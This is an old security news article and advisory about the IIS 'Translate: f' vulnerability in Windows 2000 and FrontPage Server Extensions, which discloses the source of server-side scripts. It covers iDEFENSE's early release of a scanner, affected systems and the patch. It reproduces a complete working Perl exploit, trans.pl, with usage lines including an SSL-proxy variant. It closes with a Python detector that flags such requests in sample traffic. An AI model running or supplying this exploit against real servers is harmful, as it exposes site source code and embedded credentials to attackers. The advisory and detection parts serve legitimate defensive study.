"Attack program exposed online, can get into Microsoft servers"

According to a CNET report, a network security checking program made by a Czech company can detect network vulnerabilities, get into Microsoft IIS servers, and obtain important data such as user passwords. According to wired.com, the Czech information services company iDEFENSE said the checking program was originally provided so that network administrators could test their own systems for vulnerabilities, but unexpectedly it could also become a tool for hacker intrusion. iDEFENSE pointed out that because the program was published so suddenly, Microsoft had not yet had time to release a patch, so quite a few IIS servers may end up being attacked.........

In fact, the checking program published by iDEFENSE is something most people who have been around the hacking scene for a while already know: it is a website scanner, a security-check program that tests whether a site has any already-known system vulnerabilities. The reason iDEFENSE's checking program caused trouble this time is that it included a new IIS vulnerability, which was published on the website before Microsoft had provided a patch, so some hackers may have used it to break into other people's IIS sites. The vulnerability behind iDEFENSE's blunder is the one named "Translate:f".

Vulnerability summary:

A vulnerability in IIS allows remote attackers to view the source of server-side scripts served by IIS (such as ASP, ASA, HTR, etc.). This vulnerability is very dangerous since a lot of sensitive information is kept in these files, because programmers often rely on the fact that the source code is hidden from the user. The vulnerability involves sending a special header with 'Translate: f' at the end of it, and then a trailing slash '/' appended to the end of the URL. It cannot be exploited by the standard browsers, but the exploit code below enables testing for this problem.

Details:

Vulnerable systems:
Microsoft Windows NT 2000 (IIS 5.0)
Windows NT 4.0 with FrontPage Server Extensions 2000

Immune systems:
Microsoft IIS 4.0 and below

WebDAV as implemented in Windows 2000 and Office 2000 (including FrontPage 2000 and FrontPage 2000 Server Extensions) is the source of the Translate:f problem. When someone makes a request for an ASP/ASA (or any other scriptable page) and adds "Translate: f" to the headers of the HTTP GET request (headers are not part of the URL, they are part of the raw HTTP request), a serious security bug in Windows 2000 (when unpatched by SP1) returns the complete ASP/ASA code instead of the processed file. It is necessary to add a trailing slash "/" to the end of the requested URL to make this work.

"Translate:f" is a legitimate header for WebDAV, and it is used as it should be: adding it to an HTTP GET is a signal for the WebDAV component to return the source code of the requested file and bypass processing. It is used by FrontPage 2000 and any WebDAV-compatible client to get a file for editing. It has to be accompanied by some other information, which should prevent unauthorized users from viewing the source. Unfortunately, a coding problem makes it possible to retrieve those files by simply adding "Translate:f" to the header and placing "/" at the end of the request in the HTTP GET. It is a Windows 2000 bug, but because FrontPage Server Extensions 2000 can be installed even on IIS 4.0 sites, it also affects IIS 4.0. Many IIS 4.0 sites will exhibit the "Translate: f" bug when web files are stored on a shared (network) directory; this vulnerability has been fixed in the past (see our previous article: Patch Available for the Virtualized UNC Share Vulnerability).

Fix:

Microsoft has released the following patch, which eliminates this vulnerability:
Microsoft patch Q256888_W2K_SP1_x86_en

Exploit source code:

Typical usage:
$ perl trans.pl www.example.com login.asp 80

To use against SSL sites:
1) $ sslproxy -L 127.0.0.1 -l 7555 -R www.example.com -r 443 -v Class3.pem
2) $ perl trans.pl 127.0.0.1 login.asp 7555

---cut: trans.pl---
#!/usr/bin/perl
use Socket;

#### test arguments
if ($#ARGV != 2) { die "usage: DNS_name/IP file_to_get port\n"; }

#### load values
$host   = $ARGV[0];
$port   = $ARGV[2];
$target = inet_aton($host);
$toget  = $ARGV[1];

#### build request
# The trailing backslash after the file name is treated by IIS like the
# trailing slash described above; the blank line terminates the headers.
$xtosend = <<EOT
GET /$toget\\ HTTP/1.0
Host: $host
User-Agent: SensePostData
Content-Type: application/x-www-form-urlencoded
Translate: f

EOT
;
$xtosend =~ s/\n/\r\n/g;

#### send request
#print $xtosend;
my @results = sendraw($xtosend);
print @results;

#### Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {
    # this saves the whole transaction anyway
    my ($pstr) = @_;
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die("Socket problems\n");
    if (connect(S, pack "SnA4x8", 2, $port, $target)) {
        my @in;
        select(S);
        $| = 1;
        print $pstr;
        while (<S>) {
            push @in, $_;
            print STDOUT "." if (defined $args{X});    # progress dots, only if %args is set
        }
        select(STDOUT);
        close(S);
        return @in;
    }
    else {
        die("Can't connect...\n");
    }
}
---cut----
This article was posted on 2000-09-18 00:00
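As an added example from the defender's side (not code from the original post or from SensePost), the following Python flags raw HTTP requests that match the pattern the advisory describes: a GET carrying a Translate: f header for a script file whose path ends in a trailing slash or backslash. The sample requests are constructed, and SCRIPT_EXTENSIONS holds just the extensions the advisory names.

```python
# Added example, not from the original post: flag raw HTTP requests that match
# the "Translate: f" + trailing separator source-disclosure pattern described
# above. Suitable for a reverse proxy or IDS that sees the full request headers.
SCRIPT_EXTENSIONS = (".asp", ".asa", ".htr")  # extensions named in the advisory


def parse_request(raw):
    """Return (method, path, headers) from a raw HTTP request; header names lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) < 2:
        return None, None, {}
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[0].upper(), parts[1], headers


def is_translate_f_probe(raw):
    """True when a GET carries 'Translate: f' and asks for a script file with a
    trailing '/' or '\\' (IIS treats both as path separators)."""
    method, path, headers = parse_request(raw)
    if method != "GET" or headers.get("translate", "").lower() != "f":
        return False
    stripped = path.split("?", 1)[0]
    if stripped == stripped.rstrip("/\\"):
        return False  # no trailing separator: ordinary WebDAV/FrontPage fetch
    return stripped.rstrip("/\\").lower().endswith(SCRIPT_EXTENSIONS)


def scan(requests):
    """Return the names of the requests that match the probe pattern."""
    return [name for name, raw in requests.items() if is_translate_f_probe(raw)]


# Constructed sample traffic (not captured from any real host).
SAMPLE_REQUESTS = {
    "probe_backslash": "GET /login.asp\\ HTTP/1.0\r\nHost: www.example.com\r\n"
                       "Translate: f\r\n\r\n",
    "probe_slash": "GET /global.asa/ HTTP/1.0\r\nHost: www.example.com\r\n"
                   "translate: F\r\n\r\n",
    "frontpage_edit": "GET /login.asp HTTP/1.0\r\nHost: www.example.com\r\n"
                      "Translate: f\r\n\r\n",
    "normal_get": "GET /login.asp HTTP/1.0\r\nHost: www.example.com\r\n\r\n",
    "dir_listing": "GET /docs/ HTTP/1.0\r\nTranslate: f\r\n\r\n",
}

if __name__ == "__main__":
    print(scan(SAMPLE_REQUESTS))  # ['probe_backslash', 'probe_slash']
```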